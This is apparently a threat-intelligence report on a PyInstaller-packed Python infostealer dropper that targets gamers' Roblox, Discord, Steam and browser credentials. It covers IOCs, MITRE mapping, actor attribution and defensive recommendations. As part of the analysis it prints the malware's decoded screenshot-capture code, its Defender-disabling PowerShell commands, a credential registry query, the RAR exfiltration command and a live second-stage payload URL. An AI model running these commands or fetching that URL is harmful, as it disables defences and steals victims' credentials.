mediumStealer

Python Infostealer / SKRX Dropper — Multi-Platform Credential Harvester

InvestigatedMarch 14, 2026PublishedMarch 14, 2026

stealersocial-engineeringcredential-theftc2apt

Executive Summary

main.exe is a PyInstaller-packed Python infostealer dropper attributed with high confidence to a Russian-speaking threat actor operating under the handles 68sheff and SKRX. The malware targets gamers and general Windows users, harvesting credentials from Roblox, Discord, Steam, Epic Games, and all major browsers, while simultaneously disabling Windows Defender, capturing screenshots, stealing the Windows product key, and downloading a 16MB second-stage payload from an actor-controlled GitHub repository. Stolen data is archived with embedded WinRAR (RAR password: 69sheff) and exfiltrated over HTTPS.

The actor has two GitHub repositories, one hosting the malware payload and one hosting a Telegram Mini App ("SKRX SHOP") — a Russian-language phone verification service that sells Russian phone numbers by region for prices of 300–600 rubles, consistent with SIM-verification fraud operations used to bypass two-factor authentication.

The sample was first submitted to VirusTotal on 2026-03-14, the same day it was reported, indicating it is a fresh, actively-deployed campaign.

Sample Metadata

Field	Value
SHA256	`6ea5c0b812a85b9495af90143098ff2e4b55ae7b7312e64e57de41f58ce5e161`
MD5	`87275f6110fd36ff646f2a19ccbefe73`
SHA1	`adbe2b83013476bc0bf62ead1c2832937b0d82d1`
Filename	`main.exe`
File Type	PE32+ executable (console) x86-64, for MS Windows
File Size	328,192 bytes (320 KB)
First Seen	2026-03-14 09:01:13 UTC
Reporter	SamBurchmann
VT Detections	10/76
Packer	PyInstaller (Python 3.14 runtime)
Compiler	Python → PyInstaller → PE64
PE Sections	6 (`.text`, `.rdata`, `.data`, `.pdata`, `.fptable`, `.reloc`)
Mutex	`f`

VirusTotal Detection Breakdown

Engine	Detection
Microsoft	`Trojan:Win32/Wacatac.B!ml`
Huorong	`HVM:TrojanDownloader/Small.gen!B`
CrowdStrike	`win/malicious_confidence_90% (D)`
Elastic	`malicious (high confidence)`
Cynet	`Malicious (score: 100)`
APEX	`Malicious`
DeepInstinct	`MALICIOUS`
Symantec	`ML.Attribute.HighConfidence`
Sangfor	`Trojan.Win32.Save.a`
McAfeeD	`ti!6EA5C0B812A8`

Static Analysis

Packer / Runtime

The binary is compiled with PyInstaller using Python 3.14, confirmed by the presence of python314.dll in the extracted _MEI temporary directory. PyInstaller embeds the complete Python interpreter plus all required .pyd modules and DLLs, extracting them to %TEMP%\_MEI[random]\ at runtime.

Key embedded assets identified via behavioral analysis:

File	Purpose
`python314.dll`	Python 3.14 runtime
`rar.exe`	Embedded WinRAR CLI binary for archiving stolen data
`rarreg.key`	WinRAR license key (silences nag screens)
`blank.aes`	AES key placeholder / encrypted data store
`VCRUNTIME140.dll`, `VCRUNTIME140_1.dll`	MSVC runtime
`_ssl.pyd`, `_hashlib.pyd`	SSL/crypto extensions
`_wmi.pyd`	WMI Python bindings
`_sqlite3.pyd`	SQLite (browser credential databases)

PE Structure

Section   VirtAddr   VirtSize   FileOffset  RawSize
.text     0x1000     0x37558    0x400       0x37600
.rdata    0x39000    0x1313c    0x37a00     0x13200
.data     0x4d000    0x2b20     0x4ac00     0x1400
.pdata    0x50000    0x3384     0x4c000     0x3400
.fptable  0x54000    0x100      0x4f400     0x200
.reloc    0x55000    0xa04      0x4f600     0xc00

Standard PyInstaller PE layout. The Python archive (CArchive) is embedded in the .data/overlay region. Import table shows only KERNEL32.dll, SHELL32.dll, and urlmon.dll — minimal surface area, all behavior is in the embedded Python script.

Key Imports

Import	Usage
`URLDownloadToFileA` (urlmon.dll)	Downloads second-stage payload from GitHub
`ShellExecuteA` (SHELL32.dll)	Executes downloaded second stage

Obfuscated Exfiltration Folder

The malware creates a unicode-obfuscated folder name using invisible unicode whitespace characters to hide the staging directory from casual inspection:

C:\Users\<USER>\AppData\Local\Temp\
  \x200a\x202f\x200c\x202f\x2006\xa0\x200b\x2001\x2001\x2009\
    System\
      Antivirus.txt
      System Info.txt
      Task List.txt

Characters used: Hair Space (U+200A), Narrow No-Break Space (U+202F), Zero Width Non-Joiner (U+200C), Thin Space (U+2006), No-Break Space (U+00A0), Zero Width Space (U+200B), Em Quad (U+2001), Em Space (U+2001), Thin Space (U+2009). The folder is invisible in most file managers and terminal views.

Deobfuscated / Reconstructed Behavior

Screenshot Capture (Decoded Base64 PowerShell)

The malware executes the following PowerShell via -EncodedCommand to capture screenshots of all monitors:

$source = @"
using System;
using System.Collections.Generic;
using System.Drawing;
using System.Windows.Forms;

public class Screenshot
{
    public static List<Bitmap> CaptureScreens()
    {
        var results = new List<Bitmap>();
        var allScreens = Screen.AllScreens;

        foreach (Screen screen in allScreens)
        {
            try
            {
                Rectangle bounds = screen.Bounds;
                using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
                {
                    using (Graphics graphics = Graphics.FromImage(bitmap))
                    {
                        graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top),
                            Point.Empty, bounds.Size);
                    }
                    results.Add((Bitmap)bitmap.Clone());
                }
            }
            catch (Exception) { }
        }
        return results;
    }
}
"@

Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms
$screenshots = [Screenshot]::CaptureScreens()

for ($i = 0; $i -lt $screenshots.Count; $i++){
    $screenshot = $screenshots[$i]
    $screenshot.Save("./Display ($($i+1)).png")
    $screenshot.Dispose()
}

The C# code is compiled at runtime via csc.exe (confirmed in process tree: tmoqw1b2.cmdline). Screenshots are saved as Display (1).png, Display (2).png, etc.

Data Archival Command

C:\Users\<USER>\AppData\Local\Temp\_MEI56962\rar.exe a -r -hp"69sheff" "C:\Users\<USER>\AppData\Local\Temp\yw4zP.zip" *

-a: add to archive
-r: recurse subdirectories
-hp"69sheff": encrypt archive headers with password 69sheff (the actor's handle with a digit prefix)
Output: yw4zP.zip (random 5-char filename)

Infection Chain

[Initial Execution]
    main.exe (desktop) → copies to %TEMP%\winUsysUupdehe.exe
         │
         ▼
[Defense Evasion]
    powershell Add-MpPreference -ExclusionPath winUsysUupdehe.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
               -DisableIOAVProtection $true
               -DisableIntrusionPreventionSystem $true
               -DisableScriptScanning $true
               -EnableControlledFolderAccess Disabled
               -MAPSReporting Disabled
               -SubmitSamplesConsent NeverSend
    MpCmdRun.exe -RemoveDefinitions -All
         │
         ▼
[Discovery / Reconnaissance]
    WMIC SecurityCenter2 → enumerate installed AV products → Antivirus.txt
    systeminfo → System Info.txt
    getmac → System Info.txt
    tasklist /FO LIST → Task List.txt
    tree /A /F → filesystem enumeration
    wmic os get Caption → OS version
    wmic computersystem get totalphysicalmemory → RAM
    wmic csproduct get uuid → machine UUID
    wmic path win32_VideoController get name → GPU
    ip-api.com/json/?fields=225545 → victim IP / geolocation
    powershell Get-Clipboard → clipboard contents
         │
         ▼
[Credential / Token Harvesting]
    HKCU\SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com → .ROBLOSECURITY
    HKLM\SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com → .ROBLOSECURITY
    HKLM\...\SoftwareProtectionPlatform → BackupProductKeyDefault (Windows key)
    %APPDATA%\discord\* → Discord token files
    %APPDATA%\discordcanary\* → Discord Canary tokens
    Firefox cookies.sqlite → browser session cookies
    Edge INetCookies ESE → Edge session cookies
    Steam config → Steam account data
    Epic Games config → Epic account data
         │
         ▼
[Screen Capture]
    csc.exe compiles inline C# → captures all monitors → Display (N).png
         │
         ▼
[Second Stage Download]
    URLDownloadToFileA:
    https://raw.githubusercontent.com/68sheff/GuCheckerKeySystem/main/KeyAuth%20(2).exe
    (16.2 MB — suspected full-featured RAT/stealer)
         │
         ▼
[Exfiltration]
    rar.exe a -r -hp"69sheff" %TEMP%\yw4zP.zip *
    (all collected data archived, headers encrypted)
    → exfiltration mechanism (likely Telegram bot via second stage)

Behavioral Analysis

Credential Targets

Target	Data Type	Method
Roblox	`.ROBLOSECURITY` session token	PowerShell registry query
Discord	Application tokens	File system access (`%APPDATA%\discord`)
Discord Canary	Application tokens	File system access
Steam	Account credentials/config	`C:\Program Files (x86)\Steam\config`
Epic Games	Account configuration	`%LOCALAPPDATA%\EpicGamesLauncher\Saved\Config`
Firefox	Browser cookies (all sites)	SQLite read (`cookies.sqlite`)
Edge	Browser cookies (all sites)	ESE database (`INetCookies\ESE`)
Windows OS	Product key	Registry (`BackupProductKeyDefault`)
Clipboard	Arbitrary data (crypto wallets, passwords)	`powershell Get-Clipboard`

System Profiling

The malware builds a complete victim profile:

OS name and version
Total RAM
Machine UUID (hardware fingerprint)
GPU model
MAC addresses (all network adapters)
Running process list
Installed AV products
File system tree
Geographic location (via ip-api.com)

Anti-Analysis Techniques

PyInstaller packing — Python bytecode is compressed and embedded, preventing simple string extraction
Unicode folder names — Output directory uses invisible unicode characters
Encoded PowerShell — Screenshot routine uses -EncodedCommand to bypass string-based detection
Defender disabled — Fully disables Windows Defender before any malicious activity
Self-exclusion — Adds itself to Defender's exclusion list as a first step
Minimal PE imports — Only 3 DLL imports visible in the PE header

Network Indicators

Command & Control / Payload Delivery

Indicator	Type	Purpose	Hosting
`https://raw.githubusercontent.com/68sheff/GuCheckerKeySystem/main/KeyAuth%20(2).exe`	URL	Second stage download	GitHub / Fastly CDN
`https://github.com/68sheff/GuCheckerKeySystem/raw/main/KeyAuth%20(2).exe`	URL	Second stage (alternate)	GitHub
`http://ip-api.com/json/?fields=225545`	URL	IP geolocation check	ip-api.com
`140.82.113.4`	IP	github.com	GitHub (ASN 36459)
`185.199.108.133`	IP	raw.githubusercontent.com	Fastly CDN (ASN 54113)

IP Infrastructure (Shodan)

IP	Hostnames	Open Ports	Provider
`140.82.113.4`	`www.github.com`, `github.com`, `lb-140-82-113-4-iad.github.com`	22, 80, 443	GitHub, Inc.
`185.199.108.133`	`github.com`, `githubusercontent.com`, `cdn-185-199-108-133.github.com`, `github.io`	80, 443	Fastly (GitHub CDN)

Both IPs are GitHub/Fastly infrastructure — the actor uses GitHub as a free, legitimate-looking CDN for payload hosting, making traffic blend with normal developer activity.

Actor Profile

Identity

Attribute	Value
GitHub Handle	`68sheff`
GitHub ID	185676909
Brand	`SKRX`
Account Created	2024-10-20
Language	Russian
Motivation	Financial (credential theft, SIM fraud)
Sophistication	Novice–Intermediate

Infrastructure

Asset	Details
GitHub	https://github.com/68sheff
C2 Repo	`GuCheckerKeySystem` (created 2025-11-09, updated 2025-11-09)
Side Repo	`mini-app-test` (created 2026-01-06, updated 2026-01-06)
Telegram App	`SKRX SHOP` — Russian phone verification service

SKRX SHOP (Telegram Mini App)

The actor operates a Telegram Mini App titled "SKRX SHOP" (https://github.com/68sheff/mini-app-test). Written in Russian, this webapp:

Lists Russian city regions (Moscow: 600₽, St. Petersburg: 500₽, Ekaterinburg: 400₽, Novosibirsk: 350₽, Krasnodar: 300₽)
Accepts phone numbers (+7 Russian format)
Submits "requests" to a Telegram bot via tg.sendData()
Tracks requests in localStorage under key skrx_requests

This is consistent with a phone number brokering service used for SIM-based account verification bypass (e.g., creating fraudulent accounts, bypassing 2FA).

OPSEC Mistakes

GitHub account directly linked — The C2 payload URL hardcoded in the dropper directly references the actor's personal GitHub account (68sheff)
Handle in RAR password — Password 69sheff is a trivial transformation of the actor's handle (68sheff → 69sheff)
Developer machine artifact — VT sandbox captured C:\Users\Bruno\AppData\Local\Temp\winUsysUupdehe.exe indicating the developer's personal machine username is Bruno
No domain fronting — GitHub is used directly with no obfuscation layer
Consistent naming — The skrx_requests localStorage key, SKRX SHOP branding, and GitHub handle all cross-reference
Public repository — Payload is publicly accessible; no authentication required
Simple mutex — Mutex value "f" is trivially detectable

Repo Timeline

2024-10-20  Account 68sheff created on GitHub
2025-11-09  GuCheckerKeySystem repo created (C2/payload hosting)
2025-11-09  KeyAuth (2).exe (16.2 MB second stage) uploaded
2026-01-06  mini-app-test repo created (SKRX SHOP Telegram panel)
2026-03-14  main.exe dropper first seen in the wild (this sample)

Second Stage: KeyAuth (2).exe

The second stage payload (KeyAuth (2).exe) is hosted at the actor's GitHub:

Size: 16,257,441 bytes (15.5 MB) — strongly suggests PyInstaller packaging
VT detection: 1/29 (Chong Lua Dao: malicious) — very low AV coverage
Name suggests KeyAuth branding — KeyAuth is a legitimate software licensing system frequently abused by commodity malware operators as a license check wrapper around RATs and stealers

The large size (15.5 MB) versus the 320 KB dropper suggests the second stage contains a more complete toolset, possibly including a full infostealer with browser credential extraction, crypto wallet harvesting, and Telegram-based exfiltration.

Campaign Context

This sample appears to be part of an ongoing campaign by a single Russian-speaking threat actor (68sheff/SKRX) targeting the gamer demographic:

Lure mechanism: The repo name GuCheckerKeySystem suggests the dropper is distributed as a supposed "Genshin Impact / Roblox key system checker" — a common social engineering vector in gaming communities
KeyAuth branding: Using the KeyAuth name suggests the payload is presented as a legitimate game launcher or license checker
Multi-platform credential theft: Roblox, Discord, Steam, Epic Games — all gamer-focused platforms
Roblox token theft: .ROBLOSECURITY is a high-value asset; it allows complete account takeover and access to Robux (in-game currency with real monetary value)
The SKRX SHOP: The phone verification service may serve as income alongside the stealer, or may use stolen accounts to register phone numbers

MITRE ATT&CK TTPs

Technique ID	Technique Name	Detail
T1059.001	Command and Scripting Interpreter: PowerShell	Defender disable, credential theft, screenshot capture
T1059.003	Command and Scripting Interpreter: Windows Command Shell	All execution via `cmd.exe /c` wrapper
T1562.001	Impair Defenses: Disable or Modify Tools	Full Defender disable via Set-MpPreference
T1562.004	Impair Defenses: Disable or Modify System Firewall	`-EnableNetworkProtection AuditMode`
T1036.005	Masquerading: Match Legitimate Name or Location	winUsysUupdehe.exe in %TEMP%; KeyAuth branding
T1082	System Information Discovery	systeminfo, wmic os/UUID/RAM/GPU
T1518.001	Software Discovery: Security Software Discovery	WMIC SecurityCenter2 AV enumeration
T1083	File and Directory Discovery	tree /A /F full filesystem enumeration
T1057	Process Discovery	tasklist /FO LIST
T1016	System Network Configuration Discovery	getmac — all MAC addresses
T1012	Query Registry	.ROBLOSECURITY, Windows product key
T1115	Clipboard Data	powershell Get-Clipboard
T1113	Screen Capture	C# Add-Type screenshot of all monitors
T1005	Data from Local System	Discord tokens, Steam config, browser DB
T1539	Steal Web Session Cookie	Firefox cookies.sqlite, Edge INetCookies
T1552.002	Unsecured Credentials: Credentials in Registry	Roblox token, Windows product key
T1105	Ingress Tool Transfer	Second stage via URLDownloadToFileA
T1560.001	Archive Collected Data: Archive via Utility	rar.exe with -hp"69sheff"
T1027.010	Obfuscated Files or Information: Command Obfuscation	Base64-encoded PowerShell screenshot
T1027.013	Obfuscated Files or Information: Encrypted/Encoded File	RAR with header encryption
T1027.009	Obfuscated Files or Information: Embedded Payloads	PyInstaller-embedded rar.exe, rarreg.key
T1140	Deobfuscate/Decode Files or Information	Runtime decoding of PowerShell at execution
T1071.001	Application Layer Protocol: Web Protocols	HTTPS to GitHub for payload delivery

IOCs

File Hashes

Hash	Type	Value
SHA256	Dropper	`6ea5c0b812a85b9495af90143098ff2e4b55ae7b7312e64e57de41f58ce5e161`
MD5	Dropper	`87275f6110fd36ff646f2a19ccbefe73`
SHA1	Dropper	`adbe2b83013476bc0bf62ead1c2832937b0d82d1`

Network Indicators

Indicator	Type	Context
`https://raw.githubusercontent.com/68sheff/GuCheckerKeySystem/main/KeyAuth%20(2).exe`	URL	Second stage download
`https://github.com/68sheff/GuCheckerKeySystem/raw/main/KeyAuth%20(2).exe`	URL	Second stage (alternate path)
`http://ip-api.com/json/?fields=225545`	URL	Victim IP geolocation beacon
`140.82.113.4`	IP	GitHub (C2 payload host)
`185.199.108.133`	IP	raw.githubusercontent.com CDN
`raw.githubusercontent.com`	Domain	Second stage delivery
`github.com`	Domain	Second stage delivery
`68sheff`	GitHub Actor	Actor handle

Host-Based Indicators

Indicator	Type	Context
`%TEMP%\winUsysUupdehe.exe`	Filepath	Dropper persistence copy
`%TEMP%\_MEI[0-9]+\rar.exe`	Filepath	Embedded WinRAR
`%TEMP%\_MEI[0-9]+\rarreg.key`	Filepath	WinRAR license
`%TEMP%\_MEI[0-9]+\blank.aes`	Filepath	AES key/data file
`%TEMP%\_MEI[0-9]+\python314.dll`	Filepath	Python runtime
`%TEMP%\yw4zP.zip`	Filepath	Encrypted exfil archive (name may vary)
`f`	Mutex	Process mutex
`winUsysUupdehe`	String	Dropper copy filename
`69sheff`	String	RAR archive password
`GuCheckerKeySystem`	String	GitHub repo name / URL component

Registry Indicators (Accessed)

Key	Value	Purpose
`HKCU\SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com`	`.ROBLOSECURITY`	Roblox session token theft
`HKLM\SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com`	`.ROBLOSECURITY`	Roblox session token theft
`HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform`	`BackupProductKeyDefault`	Windows product key theft

PowerShell Command Fingerprints

Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

Add-MpPreference -ExclusionPath 'C:\Users\*\AppData\Local\Temp\winUsysUupdehe.exe'

Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

Infrastructure Map

                        ┌──────────────────────────────────┐
                        │  Threat Actor: 68sheff / SKRX    │
                        │  Language: Russian               │
                        │  Dev machine user: Bruno         │
                        └───────────┬──────────────────────┘
                                    │
            ┌───────────────────────┼──────────────────────────┐
            │                       │                          │
    ┌───────▼───────┐    ┌──────────▼──────────┐    ┌─────────▼────────┐
    │ GitHub Repo 1 │    │  GitHub Repo 2       │    │  SKRX SHOP       │
    │ GuCheckerKey  │    │  mini-app-test       │    │  (Telegram Mini  │
    │ System        │    │  (JavaScript)        │    │  App)            │
    │               │    │                      │    │  Phone Broker    │
    │ KeyAuth(2).exe│    │  SKRX SHOP frontend  │    │  300-600₽/number │
    │ (16.2 MB)     │    │  Russian regions     │    │  Moscow/SPB/etc  │
    └───────┬───────┘    └──────────────────────┘    └──────────────────┘
            │
            │ URLDownloadToFileA (HTTPS)
            │
    ┌───────▼───────────────────────────────────────────────────┐
    │  main.exe (dropper)                                       │
    │  328KB PyInstaller PE64                                   │
    │  → Disables Defender                                      │
    │  → Steals: Roblox/.ROBLOSECURITY, Discord tokens,         │
    │     Steam, Epic, Firefox/Edge cookies, Win product key,   │
    │     clipboard, screenshots, system info                   │
    │  → RAR archive (password: 69sheff)                        │
    │  → Downloads KeyAuth(2).exe (second stage)                │
    └───────────────────────────────────────────────────────────┘

Attribution

Attribute	Value	Confidence
Actor	68sheff / SKRX	HIGH
Nationality	Russian	HIGH
GitHub	https://github.com/68sheff	CONFIRMED
Developer username	Bruno	MEDIUM (sandbox artifact)
Motivation	Financial — credential theft + phone fraud	HIGH
Malware type	Custom Python infostealer	HIGH
Distribution vector	Gaming communities (fake key system/launcher)	HIGH

The actor is assessed as a novice-to-intermediate Russian-speaking cybercriminal operating independently or as a small team. The use of Python + PyInstaller, GitHub for payload hosting, and simple mutex values (f) indicates limited operational security maturity. However, the breadth of credential targets and the use of unicode folder obfuscation and WinRAR header encryption shows awareness of detection techniques.

The SKRX SHOP Telegram service suggests the actor monetizes multiple streams: direct credential theft for account takeover/resale, and phone verification brokering (likely used for bypassing SMS 2FA on stolen accounts or creating fraudulent accounts at scale in Russian services).

Defensive Recommendations

Block network access to raw.githubusercontent.com for non-developer endpoints, or alert on downloads of PE files from GitHub CDN
Alert on Set-MpPreference -DisableRealtimeMonitoring in PowerShell logs (Event ID 4104)
Monitor registry reads of HKCU\SOFTWARE\Roblox\...\ROBLOSECURITY
Alert on rar.exe with -hp flag (encrypted archive creation) outside of known backup processes
Alert on csc.exe spawned from %TEMP% — PowerShell Add-Type compiles inline C# at runtime
Detect unicode-whitespace directory creation in %TEMP%
Block ip-api.com at the network perimeter (legitimate use cases are rare on enterprise endpoints)
Monitor for MpCmdRun.exe -RemoveDefinitions -All execution
Endpoint controls: Prevent cmd.exe from spawning PowerShell with Defender-modification commands

References

VirusTotal: https://www.virustotal.com/gui/file/6ea5c0b812a85b9495af90143098ff2e4b55ae7b7312e64e57de41f58ce5e161
Actor GitHub: https://github.com/68sheff
C2 Repository: https://github.com/68sheff/GuCheckerKeySystem
SKRX SHOP: https://github.com/68sheff/mini-app-test
KeyAuth (legitimate): https://keyauth.cc (abused by actor for branding)
MITRE ATT&CK: https://attack.mitre.org